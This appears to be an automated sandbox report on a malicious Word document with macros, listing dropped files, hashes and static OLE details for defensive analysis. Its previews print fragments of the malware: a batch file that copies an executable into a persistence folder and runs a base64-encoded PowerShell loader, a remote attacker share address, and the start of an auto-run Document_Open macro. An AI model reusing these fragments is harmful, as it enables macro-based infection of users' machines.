                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):15189
                                                            Entropy (8bit):5.0277781322507495
                                                            Encrypted:false
                                                            SSDEEP:384:8WvTVoGIpN6KQkj2kkjh4iUxGhaVRvRUSdOdB0RW6c:8WLV3IpNBQkj2Nh4iUxOaVRvRUSdOdBP
                                                            MD5:5B51A2E6ADEC70D7E4DDA7F1B007D70B
                                                            SHA1:7C43795768CB4E142BAF5071E76E0A01F8D42D8B
                                                            SHA-256:C7C3F5860D346AFD7C390D9D37CF93006BFD0A9796F9EA8D8AABB058BF51BE04
                                                            SHA-512:08887452E6C23C579CAB2E8DB2C533CC0BA5FDBDEDE190A929C102FEE4137685194922398CC8B8E558C59407C8F62E5B9138B2D2B3F5BC45087254BB31503832
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.....8.-./...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........Y.:j...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet...........?j...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):13312
                                                            Entropy (8bit):4.23160268880451
                                                            Encrypted:false
                                                            SSDEEP:96:Qtj5uIFU33Unp5VGemuevWeESStjTLtFjDZvlYjTb9YlNmNQkGHf9+b1vC+X0jtW:Qt/F6YqJSxtdZgemNQnIN0jWNFaz
                                                            MD5:8A85C2296BA0027A338FE589456F35C4
                                                            SHA1:C9D82C8CC486E8B51D61052DFD6FE03B82EA0FAD
                                                            SHA-256:E3600C05A7DD350D19EC1E1E4D03ED2EE9D99DAAAB9B26C38C699BC77DF8EBFF
                                                            SHA-512:314C4192635F8538541CF6B402E82211AB3E622264054E6DBCD25364980DDA15DD1D79EB5345F54B71A147DF7D88AE9258EEA9EB62522D8DBB84476B61355EAB
                                                            Malicious:false
                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8B30889-A67A-4198-8B3E-84A745ECA427}.tmp

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\3t0esm45.xw0.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\res.bat

                                                            Download File
                                                            Process:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            File Type:ASCII text, with very long lines (6011), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6078
                                                            Entropy (8bit):4.136430526920219
                                                            Encrypted:false
                                                            SSDEEP:96:hrVPq4XAF3d3EhTnEhOmohbhxNDQIVtaAPp9O6lPQkkXOyGn75or7ULZ5ViJ22t+:pVPqS43d3EhLEhOmohbhxNJBP6r7qisP
                                                            MD5:A9FE0759404CB175AFD0360B0931B33B
                                                            SHA1:45A6A60435CB89989AA1D4CA5B3EDD4FC8F86583
                                                            SHA-256:506E2708776AE85FA2DDD37B9E5B11BE5339E86DC7451758D33ED885C800A045
                                                            SHA-512:E6120FD857AA698DFC29645C1EA9808AEC6635F26DFEB4DBA4445E80A819C0DD5197EA348AC859480C388267CF8547852C3CB423D7FE71F19254C2756DF88D3A
                                                            Malicious:false
                                                            Preview:echo f | xcopy /s test2.exe "%temp%\persistent2\test2.exe" >NUL..powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAg

                                                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\test2.exe

                                                            Download File
                                                            Process:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):176128
                                                            Entropy (8bit):6.388398008506947
                                                            Encrypted:false
                                                            SSDEEP:3072:kMobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk1Bvz5:heR7eammGp0yN90QEc7
                                                            MD5:6C704BAE1033920B576DACBCFF6BFEF5
                                                            SHA1:A2B031CADB67B7F9BAE7D550E411D0412DAE538B
                                                            SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
                                                            SHA-512:B630F2ABA087E00983FEE09021A892D48A171354D8218D8F7B5B4AFF6CB2F933FC1286D69684CE689F1859174A55EC583536AAFEAB090BE9C14B7A5229050A98
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._.............".......... ......P..........@..........................................`.......... ..........................................................D...............0...x...T...............................@...........P... ............................text....~.......................... ..`.rdata.. $.......0..................@..@.data...............................@....pdata..D...........................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\l5uqr4qr.xub.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\persistent2\test2.exe

                                                            Download File
                                                            Process:C:\Windows\System32\xcopy.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):176128
                                                            Entropy (8bit):6.388398008506947
                                                            Encrypted:false
                                                            SSDEEP:3072:kMobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk1Bvz5:heR7eammGp0yN90QEc7
                                                            MD5:6C704BAE1033920B576DACBCFF6BFEF5
                                                            SHA1:A2B031CADB67B7F9BAE7D550E411D0412DAE538B
                                                            SHA-256:7C3476FD586BCB7F42E706F32999356FB4B2C8341F00B8297CF74131F6FA611C
                                                            SHA-512:B630F2ABA087E00983FEE09021A892D48A171354D8218D8F7B5B4AFF6CB2F933FC1286D69684CE689F1859174A55EC583536AAFEAB090BE9C14B7A5229050A98
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._.............".......... ......P..........@..........................................`.......... ..........................................................D...............0...x...T...............................@...........P... ............................text....~.......................... ..`.rdata.. $.......0..................@..@.data...............................@....pdata..D...........................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\q2sedjsq.x4u.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\rnctefro.opl.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\~DF23BD85EE3DE97CB5.TMP

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):4.221882728322711
                                                            Encrypted:false
                                                            SSDEEP:384:iIEoh9k3T2jljz2Sm+ytVa5XX0j+GIt2t9DgJTpVeYJZ//E:Er3T2NFyMH3k0JTpoUE
                                                            MD5:025A9FAEEE4DCECA75808DD82D1141F0
                                                            SHA1:28B6742038FAB4F6980CC7FC822DD322378DDD45
                                                            SHA-256:49A2E8F13C02C912092750D2FA4EA887B35C7A3D307DAED7E91FE01FD00F7F7F
                                                            SHA-512:6B9F4BC509F885124E083F7D2C93CC779DD255B412625CAD7ED617F0AFDC3112A08F530CA0271E127032161AA01FF5E0B9CEA4DA22EC68101CD2033B7F57E5C7
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................2...........................................................................................4...........%........... ...!..."...#...$.......&...'...(...)...*...+...,...-......./...0...1...3.......5.......6...7...8...9...:...;...<...=...>...................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\~DFBAB027C1E6951E25.TMP

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\42#U0430.LNK

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu Dec 21 07:50:09 2023, length=689664, window=hide
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.479989789727464
                                                            Encrypted:false
                                                            SSDEEP:12:8snRgXg/XAlCPCHaXJyB3XB/Dr8xX+WUcZ9OmpCGicvbdfqpCEDtZ3YilMMEpxR7:8+/XTwdxOacrvWepq7Dv3qXqk7N
                                                            MD5:96E864385EAA5BFE47B7B10FB46602E5
                                                            SHA1:F0C0471B75EBACCA8C355741CAFE3160C6F67E9F
                                                            SHA-256:287B92383BE2A80882DFE2813DBEF69187FD0531E8BC7732839FEBCC58819A18
                                                            SHA-512:E04AFEDC9FF24B98E0401F254864DC8FF5F78B21E410B92AB61ADBE7A09FBEB2B35B75AD02E69CD899C10925A0DA229C6905F61A1C96CB097EA88F5C9B1BED31
                                                            Malicious:false
                                                            Preview:L..................F.... ...@...r...@...r...x...3...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......WC...user.8......QK.X.WC.*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2......WEF .42#U0430.doc..F.......WC..WC.*.........................4.2.#.U.0.4.3.0...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\42#U0430.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.2.#.U.0.4.3.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[

                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Generic INItialization configuration [folders]
                                                            Category:dropped
                                                            Size (bytes):50
                                                            Entropy (8bit):4.333660689688185
                                                            Encrypted:false
                                                            SSDEEP:3:M1R2Alm44tAlv:Ml
                                                            MD5:3338E78048A847340BD94C90F8A85740
                                                            SHA1:6E209EF21EFDA76EA7F89FB62F6E176F5F9722C2
                                                            SHA-256:BC15E1BA6BBA9D8228903A09F3A25F2286047F0DFA420E79F778A8889334471D
                                                            SHA-512:02FB038E17B28417D801D1E51389F0E1687B7FA1DE443A96E20862CCBEDCAA62C9BA15D886C9BCB959196B018A0035E27C51FD1C24DDE00E94A6298710008A02
                                                            Malicious:false
                                                            Preview:[doc]..42#U0430.LNK=0..[folders]..42#U0430.LNK=0..

                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyRKybWKyz2dG/3WWGKbillfGgHV/ln:vdsCkWtSqA8Klp9l
                                                            MD5:3B714FD719897409D1B398BF5847D05B
                                                            SHA1:6866266D032B2AC31C26B78FF34AAA78B417B750
                                                            SHA-256:54DDB7333353A41706EF18A71962EB2C4DC6FCBFB8EEB4D9DC7EC94C15B7E49C
                                                            SHA-512:D0C3FD1795359BBA85FDD83CFB9D9859CD9E1B74BEB72EF1EDEE5E9A76931E1A3EFAE38807AEC6B4049532369B41F9A58FB0270AB07CE0B8DC55740E00607840
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            C:\Users\user\Desktop\~$#U0430.doc

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyRKybWKyz2dG/3WWGKbillfGgHV/ln:vdsCkWtSqA8Klp9l
                                                            MD5:3B714FD719897409D1B398BF5847D05B
                                                            SHA1:6866266D032B2AC31C26B78FF34AAA78B417B750
                                                            SHA-256:54DDB7333353A41706EF18A71962EB2C4DC6FCBFB8EEB4D9DC7EC94C15B7E49C
                                                            SHA-512:D0C3FD1795359BBA85FDD83CFB9D9859CD9E1B74BEB72EF1EDEE5E9A76931E1A3EFAE38807AEC6B4049532369B41F9A58FB0270AB07CE0B8DC55740E00607840
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                            \Device\Mup\89.23.98.22\PIPE\srvsvc

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:GLS_BINARY_LSB_FIRST
                                                            Category:dropped
                                                            Size (bytes):160
                                                            Entropy (8bit):4.666926004035285
                                                            Encrypted:false
                                                            SSDEEP:3:rmHfvtH//SWYhtC4d1ydYht1gUUGk+ltqqYhtq5kZty:rmHcaSgNGFlhYty
                                                            MD5:3317A43D2D73F6EDEC6009C461A003A8
                                                            SHA1:E45BBBE7C4303B6D0E566F93D1306E121C5D0AED
                                                            SHA-256:958864BEC871FCC14EB8B8245433C6D827311E86EC980566ECFD60EDCEBBAC18
                                                            SHA-512:09BBC8695DB0FCE4AB9FB993CB9FD33431C75839556CAD51B2B7348A4A13F88EAEC435CC48201252B848E2A0EBD5CE8028964692E4A2FF779482D523DDFE841A
                                                            Malicious:false
                                                            Preview:.................................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....3.qq..7I......6.........O2Kp....xZG.n.....,..l..@E............

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\xcopy.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):176
                                                            Entropy (8bit):4.754419093809963
                                                            Encrypted:false
                                                            SSDEEP:3:xDwOXp4E2J5xAIoLLmfBqGCcFscAFiyoMXjRH3glVjFTJAJhYF6dOO0+fRAfQCvN:VwOP23f4aJqn0scxmTRHwlVXPUP0ZxvN
                                                            MD5:36AA0533485635C429BCAB4DF893B466
                                                            SHA1:ABFFE680F834AA7474DAC79DB081DA70D48ABBE6
                                                            SHA-256:303508A1C175F20386E768FE5A69FA7E3468B05DFB91709AFCE2E5D9C598A10E
                                                            SHA-512:58693AC8233B5BE7DD1DD7EBB1C76CC85B1F20E8064E43BCC53F662E922D6134E8D2FF895D9205E329BDE885AC3EB8EA394BBAA5213BE99596351D933725686C
                                                            Malicious:false
                                                            Preview:Does C:\Users\user\AppData\Local\Temp\persistent2\test2.exe specify a file name..or directory name on the target..(F = file, D = directory)? f..C:test2.exe..1 File(s) copied..

                                                            Static File Info

                                                            General

                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 21 04:52:00 2023, Last Saved Time/Date: Thu Dec 21 04:52:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                            Entropy (8bit):7.643339125203098
                                                            TrID:
                                                            • Microsoft Word document (32009/1) 54.23%
                                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                            File name:42#U0430.doc
                                                            File size:688'128 bytes
                                                            MD5:de2e053acae98adbecc23ab3c0e9cf5d
                                                            SHA1:e404f9ff6a3d92fd7e153bb695be9c9eabc23d6c
                                                            SHA256:93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
                                                            SHA512:179d113540c26fbc8f838e4c5e9b2778c151bb951d5d5f1be84930dd8f00c0be3f7268ecd957fe7a5a5ca4e312fe5e87e94f07eef5a9ca00590f1ead39b54b03
                                                            SSDEEP:12288:IBZRo5+bpfzUL6/1fnXh+vNYj1p0fQ20HG7mQ7S1RMZP:8YL6pXhMWiyGiQ7URM
                                                            TLSH:8EE402C0B2439B1AF5D1D6B21C87C390985ECF84F660CC5F749C76216F3BA5ABC5862A
                                                            File Content Preview:........................>.......................%...........(....................................... ...!..."...#...$..........................................................................................................................................

                                                            File Icon

                                                            Icon Hash:2764a3aaaeb7bdbf

                                                            Static OLE Info

                                                            General

                                                            Document Type:OLE
                                                            Number of OLE Files:1

                                                            OLE File "42#U0430.doc"

                                                            Indicators
                                                            Has Summary Info:
                                                            Application Name:Microsoft Office Word
                                                            Encrypted Document:False
                                                            Contains Word Document Stream:True
                                                            Contains Workbook/Book Stream:False
                                                            Contains PowerPoint Document Stream:False
                                                            Contains Visio Document Stream:False
                                                            Contains ObjectPool Stream:False
                                                            Flash Objects Count:0
                                                            Contains VBA Macros:True
                                                            Summary
                                                            Code Page:1252
                                                            Title:
                                                            Subject:
                                                            Author:Admin
                                                            Keywords:
                                                            Comments:
                                                            Template:Normal.dotm
                                                            Last Saved By:Admin
                                                            Revion Number:3
                                                            Total Edit Time:0
                                                            Create Time:2023-12-21 04:52:00
                                                            Last Saved Time:2023-12-21 04:52:00
                                                            Number of Pages:1
                                                            Number of Words:0
                                                            Number of Characters:1
                                                            Creating Application:Microsoft Office Word
                                                            Security:0
                                                            Document Summary
                                                            Document Code Page:1252
                                                            Number of Lines:1
                                                            Number of Paragraphs:1
                                                            Thumbnail Scaling Desired:False
                                                            Company:
                                                            Contains Dirty Links:False
                                                            Shared Document:False
                                                            Changed Hyperlinks:False
                                                            Application Version:1048576

                                                            Streams with VBA

                                                            VBA File Name: NewMacros.bas, Stream Size: 1102
                                                            General
                                                            Stream Path:Macros/VBA/NewMacros
                                                            VBA File Name:NewMacros.bas
                                                            Stream Size:1102
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . 6 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . . . . . . @ . . . . .
                                                            Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 f8 03 00 00 00 00 00 00 01 00 00 00 ae fd 29 2e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "NewMacros"
Sub kjhkjhkd()
'
' kjhkjhkd Macro
'
'

End Sub

                                                            VBA File Name: ThisDocument.cls, Stream Size: 2451
                                                            General
                                                            Stream Path:Macros/VBA/ThisDocument
                                                            VBA File Name:ThisDocument.cls
                                                            Stream Size:2451
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i . s . D
                                                            Data Raw:01 16 03 00 01 f0 00 00 00 cc 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff d3 03 00 00 af 07 00 00 00 00 00 00 01 00 00 00 ae fd d9 b0 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            VBA Code
                                                            Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim FASFASFHBNVNVB As String
    Dim ireowrppqwcxva As String
    
    ' ????????? ???? ? ????? ? ???????????? ?????
